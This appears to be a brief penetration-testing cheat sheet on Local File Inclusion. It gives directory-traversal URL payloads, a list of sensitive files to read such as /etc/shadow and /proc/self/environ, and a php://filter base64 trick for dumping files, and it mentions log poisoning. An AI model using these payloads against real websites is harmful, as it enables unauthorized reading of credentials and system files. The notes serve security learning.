🏠Local File Inclusion (LFI)

Directory Traversal

Some websites allow you to include a file in the URL:

• "http://example.com/index.php?page=contact"

This can be used to maliciously exploit dynamic file inclusion

• ex: "http://example.com/index.php?page=../../../etc/passwd"

Here are some interesting files to check out :

• /etc/issue

• /etc/passwd

• /etc/shadow

• /etc/group

• /etc/hosts

• /etc/motd

• /etc/mysql/my.cnf

• /proc/[0-9]/fd/[0-9]

  • The first - number is the PID,

  • The second is the - file descriptor

• /proc/self/environ

• /proc/version

• /proc/cmdline

PHP Filter

We can use the filter wrapper to read the PHP page content using encoding like base64.

`http://example.org/index.php?file=php://filter/convert.base64-encode/resource=/etc/passwd OR /index.php

Then we can run it through a decoder and we have our content

Log Poisoning

Apache Log Poisoning through LFIHacking Articles